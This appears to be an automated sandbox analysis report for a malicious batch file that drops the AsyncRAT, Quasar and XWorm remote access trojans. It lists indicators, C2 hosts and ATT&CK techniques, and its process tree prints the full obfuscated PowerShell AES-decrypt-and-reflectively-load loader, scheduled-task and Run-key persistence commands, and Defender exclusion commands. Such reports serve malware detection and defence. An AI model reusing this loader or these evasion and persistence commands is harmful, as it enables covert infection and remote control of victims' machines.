asyncrat | 1731919d2dc81ad27833aaaf162c923c8c0e9ec12f0517c7db0409b74e9550c6

Analysis

max time kernel
149s
max time network
166s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

zvgfd-main/Part 1.bat
Size

580KB
MD5

8b844b2b29752a8a1c62efaa59dba4be
SHA1

0c467148d558c4b7d6672d5b26a79af5f7fb96d4
SHA256

ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d
SHA512

e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0
SSDEEP

12288:dgOsRaPeA/fpkyocgcQwO57n+2HCZ/ySemGKDuE2wROnCFkw:dAcbBkBJwy+2HCESoZy

Score

10^/10

asyncrat quasar xworm default slave execution persistence rat spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

xworm

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000

Attributes

Install_directory
%ProgramData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

finally-grande.gl.at.ply.gg:25844

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes

encryption_key
WyBm1iVkHZmEnGPMAZWV
install_name
$phantom.exe
log_directory
Logs
reconnect_delay
3000
startup_key
$phantomSTARTUP~MSF
subdirectory
$phantom

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral29/memory/5008-16-0x000002045B8B0000-0x000002045B960000-memory.dmp	family_xworm
behavioral29/memory/4644-56-0x0000026A9B600000-0x0000026A9B618000-memory.dmp	family_xworm
behavioral29/memory/4088-89-0x00000000002F0000-0x000000000030A000-memory.dmp	family_xworm
behavioral29/files/0x0007000000023449-85.dat	family_xworm
behavioral29/memory/4088-188-0x000000001C040000-0x000000001C04E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral29/memory/5008-16-0x000002045B8B0000-0x000002045B960000-memory.dmp	family_quasar
behavioral29/files/0x0008000000023447-62.dat	family_quasar
behavioral29/memory/4592-90-0x00000000007A0000-0x000000000080C000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral29/memory/5008-16-0x000002045B8B0000-0x000002045B960000-memory.dmp	family_asyncrat
behavioral29/files/0x0007000000023448-76.dat	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
29	4644	powershell.exe
42	4644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5008	powershell.exe
5064	powershell.exe
4644	powershell.exe
4664	powershell.exe
4344	powershell.exe
4716	powershell.exe
212	powershell.exe
4248	powershell.exe
2512	powershell.exe
2724	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Part 4.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Part 4.lnk	Part 4.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Part 4.lnk	Part 4.exe

Executes dropped EXE 5 IoCs

pid	Process
4592	Part 2.exe
4088	Part 4.exe
1072	Part 3.exe
1800	Part 4.exe
3820	Part 4.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWSBIOS = "C:\\ProgramData\\WINDOWSBIOS .COM"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Part 4 = "C:\\ProgramData\\Part 4.exe"	Part 4.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Part 3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Part 3.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2872	schtasks.exe
1716	schtasks.exe
3352	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
5008	powershell.exe
5008	powershell.exe
5064	powershell.exe
5064	powershell.exe
4644	powershell.exe
4644	powershell.exe
2724	powershell.exe
2724	powershell.exe
4664	powershell.exe
4664	powershell.exe
4344	powershell.exe
4344	powershell.exe
4716	powershell.exe
4716	powershell.exe
212	powershell.exe
212	powershell.exe
4248	powershell.exe
4248	powershell.exe
2512	powershell.exe
2512	powershell.exe
4644	powershell.exe
4088	Part 4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe
Token: 36	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe
Token: 36	5064	powershell.exe
Token: SeIncreaseQuotaPrivilege	5064	powershell.exe
Token: SeSecurityPrivilege	5064	powershell.exe
Token: SeTakeOwnershipPrivilege	5064	powershell.exe
Token: SeLoadDriverPrivilege	5064	powershell.exe
Token: SeSystemProfilePrivilege	5064	powershell.exe
Token: SeSystemtimePrivilege	5064	powershell.exe
Token: SeProfSingleProcessPrivilege	5064	powershell.exe
Token: SeIncBasePriorityPrivilege	5064	powershell.exe
Token: SeCreatePagefilePrivilege	5064	powershell.exe
Token: SeBackupPrivilege	5064	powershell.exe
Token: SeRestorePrivilege	5064	powershell.exe
Token: SeShutdownPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeSystemEnvironmentPrivilege	5064	powershell.exe
Token: SeRemoteShutdownPrivilege	5064	powershell.exe
Token: SeUndockPrivilege	5064	powershell.exe
Token: SeManageVolumePrivilege	5064	powershell.exe
Token: 33	5064	powershell.exe
Token: 34	5064	powershell.exe
Token: 35	5064	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4592	Part 2.exe
4644	powershell.exe
4088	Part 4.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 4456 wrote to memory of 2452	4456	cmd.exe	80
PID 4456 wrote to memory of 2452	4456	cmd.exe	80
PID 4456 wrote to memory of 5008	4456	cmd.exe	81
PID 4456 wrote to memory of 5008	4456	cmd.exe	81
PID 5008 wrote to memory of 5064	5008	powershell.exe	83
PID 5008 wrote to memory of 5064	5008	powershell.exe	83
PID 5008 wrote to memory of 2764	5008	powershell.exe	86
PID 5008 wrote to memory of 2764	5008	powershell.exe	86
PID 2764 wrote to memory of 3280	2764	WScript.exe	87
PID 2764 wrote to memory of 3280	2764	WScript.exe	87
PID 3280 wrote to memory of 3692	3280	cmd.exe	91
PID 3280 wrote to memory of 3692	3280	cmd.exe	91
PID 3280 wrote to memory of 4644	3280	cmd.exe	92
PID 3280 wrote to memory of 4644	3280	cmd.exe	92
PID 4644 wrote to memory of 4592	4644	powershell.exe	94
PID 4644 wrote to memory of 4592	4644	powershell.exe	94
PID 4644 wrote to memory of 4592	4644	powershell.exe	94
PID 4644 wrote to memory of 4088	4644	powershell.exe	95
PID 4644 wrote to memory of 4088	4644	powershell.exe	95
PID 4644 wrote to memory of 1072	4644	powershell.exe	96
PID 4644 wrote to memory of 1072	4644	powershell.exe	96
PID 4592 wrote to memory of 2872	4592	Part 2.exe	97
PID 4592 wrote to memory of 2872	4592	Part 2.exe	97
PID 4592 wrote to memory of 2872	4592	Part 2.exe	97
PID 4088 wrote to memory of 2724	4088	Part 4.exe	100
PID 4088 wrote to memory of 2724	4088	Part 4.exe	100
PID 4644 wrote to memory of 4664	4644	powershell.exe	102
PID 4644 wrote to memory of 4664	4644	powershell.exe	102
PID 4088 wrote to memory of 4344	4088	Part 4.exe	104
PID 4088 wrote to memory of 4344	4088	Part 4.exe	104
PID 4644 wrote to memory of 4716	4644	powershell.exe	106
PID 4644 wrote to memory of 4716	4644	powershell.exe	106
PID 4088 wrote to memory of 212	4088	Part 4.exe	108
PID 4088 wrote to memory of 212	4088	Part 4.exe	108
PID 4644 wrote to memory of 4248	4644	powershell.exe	110
PID 4644 wrote to memory of 4248	4644	powershell.exe	110
PID 4644 wrote to memory of 2512	4644	powershell.exe	112
PID 4644 wrote to memory of 2512	4644	powershell.exe	112
PID 4088 wrote to memory of 1716	4088	Part 4.exe	114
PID 4088 wrote to memory of 1716	4088	Part 4.exe	114
PID 4644 wrote to memory of 3352	4644	powershell.exe	117
PID 4644 wrote to memory of 3352	4644	powershell.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:2452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_946_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_946.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5064
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_946.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_946.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3280
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_946.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4644
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4592
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2872
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Part 4.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Part 4.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:212
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Part 4" /tr "C:\ProgramData\Part 4.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1716
      - C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe"
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:1072
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4716
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4248
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2512
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3352

C:\ProgramData\Part 4.exe
"C:\ProgramData\Part 4.exe"
1⤵
- Executes dropped EXE
PID:1800

C:\ProgramData\Part 4.exe
"C:\ProgramData\Part 4.exe"
1⤵
- Executes dropped EXE
PID:3820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Part 4.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
899715a15fe9385ae28fe2b234c0dcfd

SHA1
a5b99ba3dc80c21db4af0f59b6295c1421347683

SHA256
fcf09afe5e9b05d60c331446d67fe671912e579319794501662fbb528bc5bd02

SHA512
d292e01018bb5125bab7e8478dac5d7afd00f93f0fccf1695ad39af5386839f89676ad1ac724ac6e09b0decf3741dd8f6ef0b24b90b564abcb6be34480baf6c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4a154efa7af25bb8b94d0d9c7b4f15cd

SHA1
5e0e04103e4eef1bc7ef242b730aed1958f98e1f

SHA256
